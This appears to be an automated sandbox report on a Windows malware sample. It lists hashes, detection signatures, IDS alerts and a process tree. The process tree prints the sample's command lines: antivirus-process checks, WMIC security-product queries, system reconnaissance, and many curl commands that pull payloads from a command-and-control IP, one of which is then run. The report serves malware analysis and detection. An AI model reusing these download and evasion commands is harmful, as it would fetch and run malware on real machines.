Windows Analysis Report
vqMMwqCFZQ.exe

Overview

General Information

Sample name: vqMMwqCFZQ.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name: 5b14c48842c63552a468d3da9500bb34f3bbd1cd16decbc17a22ff0f2aada887
Analysis ID: 1560430
MD5: 8e55a7932d1b9649aba9d3e97ca688ce
SHA1: 32afffa80d0f8778c8670f1b9996c602a81de455
SHA256: 5b14c48842c63552a468d3da9500bb34f3bbd1cd16decbc17a22ff0f2aada887

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Copy itself to suspicious location via type command
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
AI detected suspicious sample
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Writes many files with high entropy
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Recon Command Output Piped To Findstr.EXE
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Usage Of Web Request Commands And Cmdlets
Too many similar processes found
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • vqMMwqCFZQ.exe (PID: 3496 cmdline: "C:\Users\user\Desktop\vqMMwqCFZQ.exe" MD5: 8E55A7932D1B9649ABA9D3E97CA688CE)
    • cmd.exe (PID: 6024 cmdline: "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5672 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3488 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 2520 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7004 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2936 cmdline: cmd /c md 139918 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6712 cmdline: findstr /V "SyntaxMilesImperialTriple" Credits MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6164 cmdline: cmd /c copy /b ..\Asked + ..\Leaving + ..\During + ..\Chairman + ..\Bracket + ..\Label + ..\Perhaps v MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Ur.pif (PID: 2476 cmdline: Ur.pif v MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 3164 cmdline: "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\807 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 6932 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName MD5: E2DE6500DE1148C7F6027AD50AC8B891)
        • cmd.exe (PID: 2724 cmdline: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\807 > C:\Users\user\AppData\Local\temp\237 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 1072 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 5568 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 4480 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6692 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 2484 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6024 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 1544 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 2060 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 5368 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 3916 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
          • Conhost.exe (PID: 6116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4124 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 5932 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 4308 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 2104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 5448 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 3020 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6012 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 428 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 2124 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 2836 cmdline: "C:\Windows\System32\cmd.exe" /C cd "C:\Users\user\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • azvw.exe (PID: 2664 cmdline: azvw.exe -o xhwq.zip MD5: 75375C22C72F1BEB76BEA39C22A1ED68)
            • Conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4092 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 2336 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
            • Conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2540 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6192 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 6300 cmdline: "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • systeminfo.exe (PID: 6416 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
            • WmiPrvSE.exe (PID: 6660 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
            • Conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • findstr.exe (PID: 6528 cmdline: findstr /C:"OS Name" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • Conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7052 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6264 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 2008 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 5828 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 5180 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 5172 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
            • Conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2520 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 4476 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 2756 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 772 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
          • Conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5568 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 4280 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
            • Conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4076 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6696 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 3520 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 1508 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • RevenueDevices.exe (PID: 1892 cmdline: "C:\Users\user\AppData\Local\temp\RevenueDevices.exe" MD5: B487B5B51436B42576D60A1FE58F8399)
          • cmd.exe (PID: 5444 cmdline: "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 3592 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • cmd.exe (PID: 5068 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 1696 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 2104 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 5632 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 5848 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 428 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
            • Conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 2896 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
        • Conhost.exe (PID: 2248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

Spreading

Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\807 > C:\Users\user\AppData\Local\temp\237, CommandLine: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\807 > C:\Users\user\AppData\Local\temp\237, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Ur.pif v, ParentImage: C:\Users\user\AppData\Local\Temp\139918\Ur.pif, ParentProcessId: 2476, ParentProcessName: Ur.pif, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\807 > C:\Users\user\AppData\Local\temp\237, ProcessId: 2724, ProcessName: cmd.exe

System Summary

Source: Process started, Author: Max Altgelt (Nextron Systems): Data: Command: Ur.pif v, CommandLine: Ur.pif v, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\139918\Ur.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\139918\Ur.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\139918\Ur.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6024, ParentProcessName: cmd.exe, ProcessCommandLine: Ur.pif v, ProcessId: 2476, ProcessName: Ur.pif
Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1, CommandLine: "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Ur.pif v, ParentImage: C:\Users\user\AppData\Local\Temp\139918\Ur.pif, ParentProcessId: 2476, ParentProcessName: Ur.pif, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1, ProcessId: 6300, ProcessName: cmd.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\vqMMwqCFZQ.exe", ParentImage: C:\Users\user\Desktop\vqMMwqCFZQ.exe, ParentProcessId: 3496, ParentProcessName: vqMMwqCFZQ.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat, ProcessId: 6024, ProcessName: cmd.exe
Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6", CommandLine: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Ur.pif v, ParentImage: C:\Users\user\AppData\Local\Temp\139918\Ur.pif, ParentProcessId: 2476, ParentProcessName: Ur.pif, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6", ProcessId: 1072, ProcessName: cmd.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started, Author: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6024, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 7004, ProcessName: findstr.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-21T20:00:35.393060+0100 | 2853767 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49874 | 178.215.224.74 | 80 | TCP
2024-11-21T20:00:35.393060+0100 | 2853768 | 1 | A Network Trojan was detected | 192.168.2.4 | 49874 | 178.215.224.74 | 80 | TCP

AV Detection

Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe, ReversingLabs: Detection: 58%
Source: vqMMwqCFZQ.exe, ReversingLabs: Detection: 66%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 94.8% probability
Source: C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exe, Joe Sandbox ML: detected
Source: vqMMwqCFZQ.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
